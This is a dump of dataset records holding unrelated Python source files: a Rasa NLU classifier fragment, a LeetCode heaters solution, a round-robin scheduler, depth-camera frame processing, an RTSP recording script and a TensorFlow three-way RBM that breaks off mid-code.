RANKING_LENGTH,\n LOSS_TYPE,\n SIMILARITY_TYPE,\n NUM_NEG,\n SPARSE_INPUT_DROPOUT,\n DENSE_INPUT_DROPOUT,\n MASKED_LM,\n ENTITY_RECOGNITION,\n TENSORBOARD_LOG_DIR,\n INTENT_CLASSIFICATION,\n EVAL_NUM_EXAMPLES,\n EVAL_NUM_EPOCHS,\n UNIDIRECTIONAL_ENCODER,\n DROP_RATE,\n DROP_RATE_ATTENTION,\n WEIGHT_SPARSITY,\n NEGATIVE_MARGIN_SCALE,\n REGULARIZATION_CONSTANT,\n SCALE_LOSS,\n USE_MAX_NEG_SIM,\n MAX_NEG_SIM,\n MAX_POS_SIM,\n EMBEDDING_DIMENSION,\n BILOU_FLAG,\n KEY_RELATIVE_ATTENTION,\n VALUE_RELATIVE_ATTENTION,\n MAX_RELATIVE_POSITION,\n AUTO,\n BALANCED,\n CROSS_ENTROPY,\n TENSORBOARD_LOG_LEVEL,\n CONCAT_DIMENSION,\n FEATURIZERS,\n CHECKPOINT_MODEL,\n SEQUENCE,\n SENTENCE,\n SEQUENCE_LENGTH,\n DENSE_DIMENSION,\n MASK,\n CONSTRAIN_SIMILARITIES,\n MODEL_CONFIDENCE,\n SOFTMAX,\n)\nfrom rasa.utils.tensorflow.data_generator import RasaBatchDataGenerator\n\nlogger = logging.getLogger(__name__)\n\n\nSPARSE = \"sparse\"\nDENSE = \"dense\"\nLABEL_KEY = LABEL\nLABEL_SUB_KEY = IDS\n\nPOSSIBLE_TAGS = [ENTITY_ATTRIBUTE_TYPE, ENTITY_ATTRIBUTE_ROLE, ENTITY_ATTRIBUTE_GROUP]\n\n\n\n\n\nclass JoinBert():\n\n def train(self,\n training_data: TrainingData,\n config: Optional[RasaNLUModelConfig] = None,\n **kwargs: Any,\n ):\n \"\"\"Train the embedding intent classifier on a data set.\"\"\"\n model_data = self.preprocess_train_data(training_data)\n if model_data.is_empty():\n logger.debug(\n f\"Cannot train '{self.__class__.__name__}'. No data was provided. \"\n f\"Skipping training of the joinbert classifier.\"\n )\n return\n\n \n def preprocess_train_data(self, training_data):\n if self.component_config[BILOU_FLAG]:\n '''user bilou: I-U-L entities for handle group entities\n '''\n bilou_utils.apply_bilou_schema(training_data)\n\n \n # intent dataset\n label_id_index_mapping = self._label_id_index_mapping(\n training_data,\n attribute=INTENT\n )\n\n if not label_id_index_mapping:\n # no labels are present to train\n return []\n \n self.index_label_id_mapping = self._invert_mapping(label_id_index_mapping)\n\n self._label_data = self._create_label_data(\n training_data, label_id_index_mapping, attribute=INTENT\n )\n\n @staticmethod\n def _label_id_index_mapping(\n training_data: TrainingData, attribute: Text\n ) -> Dict[Text, int]:\n \"\"\"Create label_id dictionary.\"\"\"\n\n distinct_label_ids = {\n example.get(attribute) for example in training_data.intent_examples\n } - {None}\n return {\n label_id: idx for idx, label_id in enumerate(sorted(distinct_label_ids))\n }\n\n @staticmethod\n def _invert_mapping(mapping: Dict) -> Dict:\n return {value: key for key, value in mapping.items()}\n\n def _create_label_data(\n self,\n training_data: TrainingData,\n label_id_dict: Dict[Text, int],\n attribute: Text,\n ) -> RasaModelData:\n \"\"\"Create matrix with label_ids encoded in rows as bag of words.\n\n Find a training example for each label and get the encoded features\n from the corresponding Message object.\n If the features are already computed, fetch them from the message object\n else compute a one hot encoding for the label as the feature vector.\n \"\"\"\n # Collect one example for each label\n labels_idx_examples = []\n for label_name, idx in label_id_dict.items():\n label_example = self._find_example_for_label(\n label_name, training_data.intent_examples, attribute\n )\n labels_idx_examples.append((idx, label_example))\n\n # Sort the list of tuples based on label_idx\n labels_idx_examples = sorted(labels_idx_examples, key=lambda x: x[0])\n labels_example = [example for (_, example) in labels_idx_examples]\n\n # Collect features, precomputed if they exist, else compute on the fly\n if self._check_labels_features_exist(labels_example, attribute):\n (\n sequence_features,\n sentence_features,\n ) = self._extract_labels_precomputed_features(labels_example, attribute)\n else:\n sequence_features = None\n sentence_features = self._compute_default_label_features(labels_example)\n\n label_data = RasaModelData()\n label_data.add_features(LABEL, SEQUENCE, sequence_features)\n label_data.add_features(LABEL, SENTENCE, sentence_features)\n\n if label_data.does_feature_not_exist(\n LABEL, SENTENCE\n ) and label_data.does_feature_not_exist(LABEL, SEQUENCE):\n raise ValueError(\n \"No label features are present. Please check your configuration file.\"\n )\n\n label_ids = np.array([idx for (idx, _) in labels_idx_examples])\n # explicitly add last dimension to label_ids\n # to track correctly dynamic sequences\n label_data.add_features(\n LABEL_KEY,\n LABEL_SUB_KEY,\n [FeatureArray(np.expand_dims(label_ids, -1), number_of_dimensions=2)],\n )\n\n label_data.add_lengths(LABEL, SEQUENCE_LENGTH, LABEL, SEQUENCE)\n\n return label_data\n\n\n\n @staticmethod\n def _find_example_for_label(\n label: Text, examples: List[Message], attribute: Text\n ) -> Optional[Message]:\n for ex in examples:\n if ex.get(attribute) == label:\n return ex\n return None\n\n def _check_labels_features_exist(\n self, labels_example: List[Message], attribute: Text\n ) -> bool:\n \"\"\"Checks if all labels have features set.\"\"\"\n\n return all(\n label_example.features_present(\n attribute, self.component_config[FEATURIZERS]\n )\n for label_example in labels_example\n )\n def _extract_labels_precomputed_features(\n self, label_examples: List[Message], attribute: Text = INTENT\n ) -> Tuple[List[FeatureArray], List[FeatureArray]]:\n \"\"\"Collects precomputed encodings.\"\"\"\n features = defaultdict(list)\n\n for e in label_examples:\n label_features = self._extract_features(e, attribute)\n for feature_key, feature_value in label_features.items():\n features[feature_key].append(feature_value)\n\n sequence_features = []\n sentence_features = []\n for feature_name, feature_value in features.items():\n if SEQUENCE in feature_name:\n sequence_features.append(\n FeatureArray(np.array(feature_value), number_of_dimensions=3)\n )\n else:\n sentence_features.append(\n FeatureArray(np.array(feature_value), number_of_dimensions=3)\n )\n\n return sequence_features, sentence_features\n\n def _extract_features(\n self, message: Message, attribute: Text\n ) -> Dict[Text, Union[scipy.sparse.spmatrix, np.ndarray]]:\n (\n sparse_sequence_features,\n sparse_sentence_features,\n ) = message.get_sparse_features(attribute, self.component_config[FEATURIZERS])\n dense_sequence_features, dense_sentence_features = message.get_dense_features(\n attribute, self.component_config[FEATURIZERS]\n )\n\n if dense_sequence_features is not None and sparse_sequence_features is not None:\n if (\n dense_sequence_features.features.shape[0]\n != sparse_sequence_features.features.shape[0]\n ):\n raise ValueError(\n f\"Sequence dimensions for sparse and dense sequence features \"\n f\"don't coincide in '{message.get(TEXT)}'\"\n f\"for attribute '{attribute}'.\"\n )\n if dense_sentence_features is not None and sparse_sentence_features is not None:\n if (\n dense_sentence_features.features.shape[0]\n != sparse_sentence_features.features.shape[0]\n ):\n raise ValueError(\n f\"Sequence dimensions for sparse and dense sentence features \"\n f\"don't coincide in '{message.get(TEXT)}'\"\n f\"for attribute '{attribute}'.\"\n )\n\n # If we don't use the transformer and we don't want to do entity recognition,\n # to speed up training take only the sentence features as feature vector.\n # We would not make use of the sequence anyway in this setup. Carrying over\n # those features to the actual training process takes quite some time.\n if (\n self.component_config[NUM_TRANSFORMER_LAYERS] == 0\n and not self.component_config[ENTITY_RECOGNITION]\n and attribute not in [INTENT, INTENT_RESPONSE_KEY]\n ):\n sparse_sequence_features = None\n dense_sequence_features = None\n\n out = {}\n\n if sparse_sentence_features is not None:\n out[f\"{SPARSE}_{SENTENCE}\"] = sparse_sentence_features.features\n if sparse_sequence_features is not None:\n out[f\"{SPARSE}_{SEQUENCE}\"] = sparse_sequence_features.features\n if dense_sentence_features is not None:\n out[f\"{DENSE}_{SENTENCE}\"] = dense_sentence_features.features\n if dense_sequence_features is not None:\n out[f\"{DENSE}_{SEQUENCE}\"] = dense_sequence_features.features\n\n return out","sub_path":"src/mynlu/backup.py","file_name":"backup.py","file_ext":"py","file_size_in_byte":11395,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"647462412","text":"\"\"\"\nYour input will be the positions of houses and heaters seperately, and your expected output will be the minimum radius standard of heaters.\n\nNote:\nNumbers of houses and heaters you are given are non-negative and will not exceed 25000.\nPositions of houses and heaters you are given are non-negative and will not exceed 10^9.\nAs long as a house is in the heaters' warm radius range, it can be warmed.\nAll the heaters follow your radius standard and the warm radius will the same.\n \nExample 1:\nInput: [1,2,3],[2]\nOutput: 1\nExplanation: The only heater was placed in the position 2, and if we use the radius 1 standard, then all the houses can be warmed.\n\nExample 2:\nInput: [1,2,3,4],[1,4]\nOutput: 1\nExplanation: The two heater was placed in the position 1 and 4. We need to use radius 1 standard, then all the houses can be warmed.\n\n由于headers和houses可能是乱序,所以要先排序。然后给heaters两端各加一个假的heater,这样所有house都会在heater之中。对每一个house,检查它与两端\nheaters的距离,较小的那个辐射半径就足够了,然后找出这些辐射半径里的最大值,保证所有房子都可以辐射的到。\n\n\"\"\"\n\ndef findRadius(self, houses, heaters):\n \"\"\"\n :type houses: List[int]\n :type heaters: List[int]\n :rtype: int\n \"\"\"\n houses.sort()\n heaters.sort()\n ans, i = 0, 0\n new_heaters = [float('-inf')] + heaters + [float('inf')]\n for house in houses:\n while house > new_heaters[i + 1]:\n i += 1\n min_dis = min(house-new_heaters[i], new_heaters[i+1]-house)\n ans = max(ans, min_dis)\n return ans\n","sub_path":"leetcode-475. Heaters.py","file_name":"leetcode-475. Heaters.py","file_ext":"py","file_size_in_byte":1687,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"583993321","text":"from random import randint\nfrom core.Planificador import Planificador\nfrom math import ceil\nclass RoundRobin4(Planificador):\n def __init__(self,log,quantum,procesos):\n Planificador.__init__(self,log,quantum*4,procesos)\n \n def iniciar_planificador(self):\n self.mostrar_procesos()\n self.planificar()\n \n def planificar(self):\n texto = \"\"\n total = 0\n procesos_listos = []\n for proceso in self.procesos:\n proceso = {\"nombre\":proceso.nombre,\"t\":ceil(proceso.t/self.quantum),\"quantum\":ceil(proceso.t/self.quantum),\"llegada\":proceso.llegada,\"inicio\":-1,\"fin\":0}\n procesos_listos.append(proceso)\n procesos_terminados = []\n texto = \"\"\n while(len(procesos_listos) > 0):\n procesos_temp = []\n avant = False\n for proceso in procesos_listos:\n if(proceso[\"quantum\"] > 0):\n if(proceso[\"llegada\"] > total and total == 0):\n proceso[\"inicio\"] = proceso[\"llegada\"]\n total = proceso[\"inicio\"]\n texto = texto + proceso[\"nombre\"]\n proceso[\"quantum\"] = (proceso[\"quantum\"] - 1)\n total = total + 1\n avant = True\n elif(proceso[\"llegada\"] == total and proceso[\"inicio\"]== -1):\n proceso[\"inicio\"] = total\n texto = texto + proceso[\"nombre\"]\n proceso[\"quantum\"] = proceso[\"quantum\"] - 1\n total = total + 1\n avant = True\n elif(proceso[\"llegada\"] < total):\n if(proceso[\"inicio\"] < 0):\n proceso[\"inicio\"] = total\n texto = texto + proceso[\"nombre\"]\n proceso[\"quantum\"] = proceso[\"quantum\"] -1\n total = total + 1\n avant = True\n procesos_temp.append(proceso)\n else:\n proceso[\"fin\"] = total\n procesos_terminados.append(proceso)\n if(avant == False):\n texto = texto + \"[ ]\"\n total = total + 1\n procesos_listos = procesos_temp\n for proceso in procesos_terminados:\n T = proceso[\"fin\"] - proceso[\"llegada\"]\n self.T_list.append(T)\n P = T/proceso[\"t\"]\n self.P_list.append(P)\n R = proceso[\"t\"]/T\n self.R_list.append(R)\n E = T - proceso[\"t\"]\n self.E_list.append(E)\n \n promedios = self.get_promedios()\n print(\"RR4: T={0}, E={1}, P={2}\".format(promedios['T'],promedios['E'],promedios['P']))\n print(texto)\n","sub_path":"tareas/3/RomeroVicente/core/RoundRobin4.py","file_name":"RoundRobin4.py","file_ext":"py","file_size_in_byte":2811,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"102676236","text":"# coding: utf-8\n\nimport os\nimport cv2 as cv\nimport numpy as np\nimport json\nimport time\n\nclass R200Frame:\n \n def __init__(self, bgr_frame, depth_frame, depth_scale):\n self.rgb = cv.cvtColor(bgr_frame, cv.COLOR_BGR2RGB)\n self.depth = depth_frame\n self.depth_scale = depth_scale\n \n def depth_middle_crosshair(self, crosshair_size):\n \n height_ratio = self.rgb.shape[0]/self.depth.shape[0]\n width_ratio = self.rgb.shape[1]/self.depth.shape[1]\n \n depth_start_height = int((self.depth.shape[0]-crosshair_size)/2 - 1)\n depth_end_height = int((self.depth.shape[0]-crosshair_size)/2 - 1 + crosshair_size)\n depth_start_width = int((self.depth.shape[1]-crosshair_size)/2 - 1)\n depth_end_width = int((self.depth.shape[1]-crosshair_size)/2 - 1 + crosshair_size)\n \n rgb_start_height = int((depth_start_height + 1) * height_ratio - 1)\n rgb_end_height = int((depth_end_height + 1) * height_ratio - 1)\n rgb_start_width = int((depth_start_width + 1) * width_ratio - 1)\n rgb_end_width = int((depth_end_width + 1) * width_ratio - 1)\n \n # Sanity check\n if not (\n (rgb_start_height + crosshair_size*height_ratio == rgb_end_height) \n and (rgb_start_width + crosshair_size*width_ratio == rgb_end_width)):\n print(\"Crosshair making failed\")\n if not crosshair_size % 2 == 0:\n print(\"Crosshair size has to be an even number\")\n \n # Making a crossair on the color image\n display = self.rgb\n crosshair = np.zeros(display.shape, dtype=display.dtype)\n crosshair[rgb_start_height:rgb_end_height, rgb_start_width:rgb_end_width] = [255, 0 , 0]\n display = cv.add(display, crosshair)\n \n # Calculating depth on depth image\n center_values = self.depth[depth_start_height:depth_end_height,depth_start_width:depth_end_width].flatten()\n center_values = [value for value in center_values if value != 0 ]\n # If no values make mean = 0\n center_mean_value = np.mean(center_values) if len(center_values) != 0 else 0\n depth = center_mean_value * self.depth_scale\n \n return (depth, display)\n \n def depth_to_uint8(self):\n \n depth = self.depth\n depth = (depth/256).astype('uint8')\n \n return depth\n \n def depth_to_float32(self):\n \n depth = self.depth\n depth = depth.astype('float32')\n \n return depth\n \n def depth_to_rgb(self):\n \n depth = self.depth_to_uint8()\n depth = cv.cvtColor(depth, cv.COLOR_GRAY2RGB)\n \n return depth\n \n def clip_depth_max(self, max_distance):\n \n distance_upper_limit = max_distance / self.depth_scale / 256\n\n # All values out of range set to black\n clip_max = np.copy(self.depth_to_uint8())\n clip_max[clip_max > distance_upper_limit] = 0\n \n return clip_max\n \n def find_contours(self):\n \n # Variables\n max_distance = 10\n gaussian_filter_size = 7\n length_threshold = 150\n \n # Finding edges in depth image\n clipped = self.clip_depth_max(max_distance)\n gaussian = cv.GaussianBlur(clipped, (gaussian_filter_size, gaussian_filter_size), 0)\n canned = cv.Canny(gaussian, 10, 25, L2gradient=True)\n \n img, c, h = cv.findContours(canned, cv.RETR_TREE, cv.CHAIN_APPROX_NONE)\n contours = np.zeros((canned.shape), np.uint8)\n\n for cnt in c:\n if cv.arcLength(cnt, True) > length_threshold:\n cv.drawContours(contours, cnt, -1, 255, 1)\n \n return contours\n \n def find_bounding_box(self):\n \n contours = self.find_contours()\n \n # HoughLine transform no 1\n delta_theta = 15 #degrees\n min_line_length = 10 \n max_line_gap = 20\n hough_threshold = 20\n\n # Finding roughly vertical lines\n dilated = cv.dilate(contours, np.ones((2,2), np.uint8))\n linesP = cv.HoughLinesP(dilated,\n 1, \n np.pi/180, \n hough_threshold, \n None, \n min_line_length, \n max_line_gap)\n \n hough = np.zeros((contours.shape), np.uint8)\n \n if linesP is not None:\n for i in range(0, len(linesP)):\n \n l = linesP[i][0]\n atan = np.arctan2(l[1] - l[3], l[0] - l[2]) * 180 / np.pi\n\n if (((atan > 90 - delta_theta) \n & (atan < 90 + delta_theta)) \n | ((atan > -90 - delta_theta) \n & (atan < -90 + delta_theta))):\n cv.line(hough, (l[0], l[1]), (l[2], l[3]), 255, 2, cv.LINE_AA)\n \n bounding_box = self.depth_to_rgb()\n \n # HoughLine transform no 2\n min_line_length = 75\n max_line_gap = 5\n hough_threshold = 10\n \n edge_lines = cv.dilate(hough, np.ones((2,2), np.uint8))\n linesF = cv.HoughLinesP(edge_lines,\n 1, \n np.pi/180, \n hough_threshold, \n None, \n min_line_length, \n max_line_gap)\n \n edges = np.zeros((contours.shape), np.uint8)\n\n if linesF is not None:\n for i in range(0, len(linesF)):\n l = linesF[i][0]\n cv.line(edges, (l[0], l[1]), (l[2], l[3]), 255, 2, cv.LINE_AA)\n cv.line(bounding_box, (l[0], l[1]), (l[2], l[3]), (0,0,255), 2)\n \n i = 0\n \n for column in edges.T:\n if sum(column) > 255 * 5:\n break\n i += 1\n i += 1\n min_x = i\n \n cv.line(bounding_box, (i, 0), (i, contours.shape[1]-1), (255,0,0), 2)\n \n i = contours.shape[1]-1\n \n for column in reversed(edges.T):\n if sum(column) > 255 * 5:\n break\n i -= 1\n i -= 1\n max_x = i\n \n cv.line(bounding_box, (i, 0), (i, contours.shape[1]-1), (255,0,0), 2)\n \n return bounding_box\n\n def values_between(self, bottom_distance_limit, top_distance_limit):\n \n # Threshold for bottom and top limit\n mask = cv.inRange(self.depth, bottom_distance_limit//self.depth_scale, \\\n top_distance_limit//self.depth_scale) \n nb_values = np.count_nonzero(mask)\n return (nb_values, mask)\n \n def show_depth_values(self, bottom_distance_limit, top_distance_limit):\n \n depth_color = self.depth_to_rgb()\n \n (nb_values, mask) = self.values_between(bottom_distance_limit, top_distance_limit)\n mask = cv.cvtColor(mask, cv.COLOR_GRAY2RGB)\n \n redmask = self.depth_to_rgb()\n redmask[:,:] = [255, 0 , 0]\n redmask = cv.bitwise_and(mask, redmask)\n \n depth_colored = cv.add(depth_color, redmask)\n \n return (nb_values, depth_colored)\n \n def depth_histogram(self, start, stop, nb_of_bins):\n \n histogram = []\n labels = np.linspace(start, stop, nb_of_bins, endpoint=True)\n diff = (stop-start)/(nb_of_bins-1)\n \n for bound in np.linspace(start, stop, nb_of_bins, endpoint=True):\n (nb_values, mask) = self.values_between(bound, bound + diff)\n histogram.append(nb_values)\n \n return (labels, histogram)\n \n def depth_min(self):\n \n simple_threshold = 150\n depth_min_value = 0\n \n min_distance = 0.5\n max_distance = 10.5\n diff = 2.5\n nb_of_bins = (max_distance - min_distance)/diff + 1.0\n \n # Calculate values for each bins\n for bound in np.linspace(min_distance, max_distance, nb_of_bins, endpoint=True):\n (nb_values, mask) = self.values_between(bound, bound + diff)\n depth_min_value = bound\n\n # Logic to determine distance\n if nb_values > simple_threshold:\n break\n\n min_distance = bound \n max_distance = bound + diff\n diff = 0.5\n nb_of_bins = (max_distance - min_distance)/diff + 1.0\n for bound in np.linspace(min_distance, max_distance, nb_of_bins, endpoint=True):\n (nb_values, mask) = self.values_between(bound, bound + diff)\n depth_min_value = bound\n\n # Logic to determine distance\n if nb_values > simple_threshold:\n break\n \n min_distance = bound \n max_distance = bound + diff\n diff = 0.1\n nb_of_bins = (max_distance - min_distance)/diff + 1.0\n for bound in np.linspace(min_distance, max_distance, nb_of_bins, endpoint=True):\n (nb_values, mask) = self.values_between(bound, bound + diff)\n depth_min_value = bound\n\n # Logic to determine distance\n if nb_values > simple_threshold:\n break\n\n return depth_min_value\n\n def depth_min_score(self):\n \n # Uses ROI to score if closest objects are relevant\n score = 3\n return score\n\n def detect_drone(self):\n gray = cv.cvtColor(self.rgb,cv.COLOR_BGR2GRAY)\n _,thresh = cv.threshold(gray,50,255,cv.THRESH_BINARY_INV)\n _,cnt,_ = cv.findContours(thresh,cv.RETR_EXTERNAL,cv.CHAIN_APPROX_SIMPLE)\n if(len(cnt)!=0):\n c = max(cnt, key = cv.contourArea)\n return c\n else:\n return None\n\n def getDepthMeanValue(self,center,size):\n depth_start_height = center[1]-size*2\n depth_end_height = center[1]+size*2\n depth_start_width = center[0]-size\n depth_end_width = center[0]+size\n center_values = self.depth[depth_start_height:depth_end_height,depth_start_width:depth_end_width].flatten()\n center_values = [value for value in center_values if value != 0 ]\n center_mean_value = np.mean(center_values) if len(center_values) != 0 else 0\n depth = center_mean_value * self.depth_scale\n return depth\n \n \n def __str__(self):\n return ''.format(hex(id(self)))\n \n def __repr__(self):\n return ''.format(hex(id(self)))\n\nclass R200Video:\n \n __settings_name__ = 'Settings.json' # Will change to Settings.json\n __image_rgb_prefix__ = 'ImageRGB_'\n __image_rgb_suffix__ = '.jpg'\n __image_depth_prefix__ = 'ImageDepth_'\n __image_depth_suffix__ = '.tiff'\n \n def __init__(self, folder_path):\n self.path = folder_path\n self.error = False\n self.film_length = 0\n self.depth_scale = 0\n self.fps = 30\n self.camera = ''\n self.rgb_shape = 0\n self.depth_shape = 0\n self.frames = []\n \n # If folder_path doesn't finish with / add it\n if not folder_path.endswith('/'):\n self.path = folder_path + '/'\n \n # Check if the folder exists\n path_exist = os.path.isdir(self.path)\n if not path_exist:\n self.error = True\n \n # Check if settings file exists\n settings_exist = os.path.isfile(self.path + self.__settings_name__)\n if not settings_exist:\n self.error = True\n \n if self.error:\n print('No settings file found for video')\n return None\n \n self.parse_settings_file()\n \n # Get number of images\n file_list = os.listdir(self.path)\n self.film_length = len([file for file in file_list if '.tiff' in file])\n \n # Get all images\n for index in range(self.film_length):\n image_rgb_path = (self.path \n + self.__image_rgb_prefix__ \n + '{0:05}'.format(index) \n + self.__image_rgb_suffix__)\n image_depth_path = (self.path \n + self.__image_depth_prefix__ \n + '{0:05}'.format(index) \n + self.__image_depth_suffix__)\n \n frame = R200Frame(cv.imread(image_rgb_path),\n cv.imread(image_depth_path, cv.IMREAD_ANYDEPTH),\n self.depth_scale)\n self.frames.append(frame)\n \n # Get video shape\n self.rgb_shape = self.frames[0].rgb.shape\n self.depth_shape = self.frames[0].depth.shape\n \n if self.error:\n print('Error occured while loading video')\n \n \n def parse_settings_file(self):\n \n with open(self.path + self.__settings_name__, \"r\") as file:\n try:\n settings = json.load(file)\n \n if 'camera' in settings:\n self.camera = settings['camera']\n else:\n print('Camera type not found in settings')\n self.error = True\n \n if 'scale' in settings:\n try:\n self.depth_scale = float(settings['scale'])\n except:\n print('Scale could not be converted to float')\n self.error = True\n else:\n print('Depth scale not found in settings')\n self.error = True\n \n if 'fps' in settings:\n try:\n self.fps = int(settings['fps'])\n except:\n print('Fps could not be converted to int')\n self.error = True\n else:\n print('Fps not found in settings')\n self.error = True\n \n except json.JSONDecodeError:\n print('Settings file is not in correct JSON format')\n self.error = True\n \n \n def show_rgb(self):\n \n while True:\n\n for frame in self:\n\n cv.imshow(\"RGB Video\", cv.cvtColor(frame.rgb, cv.COLOR_RGB2BGR))\n \n # Exit if ESC pressed\n k = cv.waitKey(1) & 0xff\n if k == 27 : break\n \n time.sleep(1/self.fps)\n \n cv.destroyAllWindows()\n break\n \n return None\n \n def __getitem__(self, index):\n return self.frames[index]\n \n def __iter__(self):\n self.n = 0\n return self\n \n def __next__(self):\n if self.n <= self.film_length - 1:\n result = self.frames[self.n]\n self.n += 1\n return result\n else:\n raise StopIteration\n\n def next(self):\n if self.n <= self.film_length - 1:\n result = self.frames[self.n]\n self.n += 1\n return result\n else:\n raise StopIteration\n \n def __len__(self):\n return self.film_length\n \n def save(self, folder_path):\n # IMPLEMENT A WAY TO WRITE VIDEO ON DISK\n return True\n\n def __str__(self):\n return ''.format(hex(id(self)))\n \n def __repr__(self):\n return ''.format(hex(id(self)))\n","sub_path":"r200.py","file_name":"r200.py","file_ext":"py","file_size_in_byte":15974,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"401027928","text":"import cvlib as cv\nimport time\nimport cv2\nimport argparse\n\nparser = argparse.ArgumentParser()\nparser.add_argument('--cam'\t\t, default=\"rtsp://admin:admin1234@192.168.15.220:554/Streaming/channels/402\")\nparser.add_argument('--output'\t, default=\"Video.avi\")\nparser.add_argument('--max_time', type=float, default=300)\nargs = parser.parse_args()\n\nstart=time.time()\ncap \t\t\t\t= cv2.VideoCapture(args.cam)\nfourcc = cv2.VideoWriter_fourcc(*'DIVX')\nheight = cap.get(4)\nwidth = cap.get(3)\nout = cv2.VideoWriter(args.output, fourcc, 10.0, (int(width),int(height)))\nframe_count = 0\n\nwhile True:\n\t#print(time.time()-start,args.max_time)\n\tif (time.time()-start)>=args.max_time:\n\t\tprint(time.time()-start,frame_count/(time.time()-start))\n\t\texit()\n\n\tres, img = cap.read()\n\tframe_count += 1\n\tout.write(img)\n\t# cv2.imshow(\"asdf\",img)\n\n\t# if cv2.waitKey(1) & 0xFF == ord('q'):\n\t# \tprint(time.time()-start,frame_count/(time.time()-start))\n\t# \tbreak","sub_path":"pruebas/store_video.py","file_name":"store_video.py","file_ext":"py","file_size_in_byte":994,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"211915169","text":"\"\"\" An rbm implementation for TensorFlow, based closely on the one in Theano \"\"\"\n\nimport tensorflow as tf\nimport math\nimport numpy as np\nfrom tqdm import tqdm\nimport matplotlib.pyplot as plt\nimport itertools\n\n\ndef sample_prob(probs):\n \"\"\"Takes a tensor of probabilities (as from a sigmoidal activation)\n and samples from all the distributions\"\"\"\n return tf.nn.relu(\n tf.sign(\n probs - tf.random_uniform(probs.get_shape())))\n\n\ndef generate_v(n_v, mu_v, sig_v):\n v = np.random.normal(mu_v, sig_v, n_v)\n return v\n\n\ndef gen_batches(data, batch_size):\n \"\"\"Divide input data into batches.\n :param data: input data\n :param batch_size: size of each batch\n :return: data divided into batches\n \"\"\"\n data = np.array(data)\n\n for i in range(0, data.shape[0], batch_size):\n yield data[i:i + batch_size]\n\n\nclass RBM(object):\n \"\"\" represents a 3-way rbm \"\"\"\n\n def __init__(self, name, v1_size, h_size, v2_size, n_data, batch_size, num_epochs=100, learning_rate=0.1, k=1,\n use_tqdm=True, show_err_plt=True,n_factors=50):\n with tf.name_scope(\"rbm_\" + name):\n self.v1_size = v1_size\n self.v2_size = v2_size\n self.h_size = h_size\n self.fweights_v1 = tf.Variable(\n tf.truncated_normal([v1_size, n_factors],\n stddev=1.0 / math.sqrt(float((v1_size + v2_size) / 2))), name=\"weights\")\n self.fweights_v2 = tf.Variable(\n tf.truncated_normal([v2_size, n_factors],\n stddev=1.0 / math.sqrt(float((v1_size + v2_size) / 2))), name=\"weights\")\n self.fweights_h = tf.Variable(\n tf.truncated_normal([h_size, n_factors],\n stddev=1.0 / math.sqrt(float((v1_size + v2_size) / 2))), name=\"weights\")\n self.h_bias = tf.Variable(tf.zeros([1, h_size]), name=\"h_bias\",dtype=tf.float32)\n self.v1_bias = tf.Variable(tf.zeros([1, v1_size]), name=\"v1_bias\",dtype=tf.float32)\n self.v1_var = tf.constant(np.ones([v1_size]), name=\"v1_var\",dtype=tf.float32)\n self.v2_bias = tf.Variable(tf.zeros([1, v2_size]), name=\"v1_bias\",dtype=tf.float32)\n self.v2_var = tf.constant(np.ones([v2_size]), name=\"v1_var\",dtype=tf.float32)\n\n self.batch_size = batch_size\n self.n_batches = n_data // batch_size # assume it will be an integer\n\n self.num_epochs = num_epochs\n self.learning_rate = learning_rate\n self.k = k\n\n self.use_tqdm = use_tqdm\n self.show_err_plt = show_err_plt\n\n self.v1_input = tf.placeholder('float32', (self.batch_size, self.v1_size))\n self.v2_input = tf.placeholder('float32', (self.batch_size, self.v2_size))\n\n self.compute_err = None # filled in reconstruction error\n self.tf_session = None\n \n self.cost = []\n\n self.final_h = None\n\n def _prop_helper(self, a, b, a_weights, b_weights, t_weights):\n \"\"\"a and b should be matricies of row vectors\"\"\"\n inter = tf.multiply(tf.matmul(a, a_weights),tf.matmul(b, b_weights))\n return tf.matmul(inter,tf.transpose(t_weights))\n\n def prop_v1v2_h(self, v1, v2):\n \"\"\" P(h|v1,v2) \"\"\"\n return tf.nn.sigmoid(self._prop_helper(v1, v2, self.fweights_v1, self.fweights_v2, self.fweights_h) + self.h_bias)\n\n def prop_v1h_v2(self, v1, h):\n \"\"\" P(v2|v1,h) \"\"\"\n return self._prop_helper(v1, h, self.fweights_v1, self.fweights_h, self.fweights_v2) + self.v2_bias\n\n def prop_v2h_v1(self, v2, h):\n \"\"\" P(v1|v2,h) \"\"\"\n return self._prop_helper(v2, h, self.fweights_v2, self.fweights_h, self.fweights_v1) + self.v1_bias\n\n def sample_v1_given_v2h(self, v2, h):\n \"\"\" generate sample of v1 from v2 and h\"\"\"\n dist = tf.contrib.distributions.Normal(tf.cast(self.prop_v2h_v1(v2, h), tf.float32),\n tf.cast(tf.tile(tf.expand_dims(self.v1_var, 0), [v2.get_shape().as_list()[0], 1]),\n tf.float32))\n return tf.reduce_sum(dist.sample(1), 0)\n\n def sample_v2_given_v1h(self, v1, h):\n \"\"\" generate sample of v1 from v2 and h\"\"\"\n dist = tf.contrib.distributions.Normal(tf.cast(self.prop_v1h_v2(v1, h), tf.float32),\n tf.cast(tf.tile(tf.expand_dims(self.v2_var, 0), [v1.get_shape().as_list()[0], 1]),\n tf.float32))\n return tf.reduce_sum(dist.sample(1), 0)\n\n def sample_h_given_v1v2(self, v1, v2):\n \"\"\" Generate a sample from the hidden layer \"\"\"\n return sample_prob(self.prop_v1v2_h(v1, v2))\n\n @staticmethod\n def get_delta_products(t, a, b, a_weights, b_weights):\n \"\"\" inputs are normalized feature vectors (i.e. v1/v1_var)\"\"\"\n inter = tf.multiply(tf.matmul(a,a_weights),tf.matmul(b,b_weights))\n return tf.matmul(tf.transpose(t),inter)\n\n def gibbs(self, v1, h, v2):\n\n # using mean field values\n v1 = self.prop_v2h_v1(v2, h)\n v2 = self.prop_v1h_v2(v1, h)\n h = self.prop_v1v2_h(v1, v2)\n\n # using sampling\n # v1 = self.sample_v1_given_v2h(v2, h)\n # v2 = self.sample_v2_given_v1h(v1, h)\n # h = sample_h_given_v1v2(v1, v2)\n\n return v1, h, v2\n\n def train(self, v1_input, v2_input):\n \"\"\"train RBM\"\"\"\n\n self.pcd_k() # define pcd step\n self.reconstruction_error() # define error metric\n\n self.tf_session = 